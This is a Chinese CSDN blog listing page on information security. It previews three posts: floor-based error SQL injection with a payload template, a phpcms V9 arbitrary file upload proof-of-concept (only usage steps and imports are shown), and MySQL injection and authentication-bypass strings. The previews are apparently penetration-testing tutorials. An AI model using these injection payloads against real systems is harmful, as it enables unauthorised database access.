![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
信息安全
soldier_wing
这个作者很懒,什么都没留下…
展开
-
SQL注入之报错注入
报错注入通过floor报错注入 固定语句公式 union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a from information_schema.tables group by a)b例子假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from arti原创 2017-06-30 14:28:20 · 1184 阅读 · 0 评论 -
phpcms_V9任意文件上传poc
使用方法:先编译 javac -encoding UTF-8 Main.java 然后运行 java Main URL(http://www.xxxx.com) import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;import java.io.OutputStream原创 2017-06-30 16:21:35 · 1446 阅读 · 0 评论 -
MySQL注入技巧
1 MySQL语法以及认证绕过 注释符: # – X(X为任意字符) /*(MySQL-5.1) ;%00 'or 1=1;%00 'or 1=1 union select 1,2’ ‘or 1=1 # ‘/!50000or/ 1=1 – - //版本号为5.1.38时只要小于50138 ‘/!or/ 1=1 – - 前缀: 任意混合 + - ~ ! ‘or原创 2017-06-30 15:41:57 · 357 阅读 · 0 评论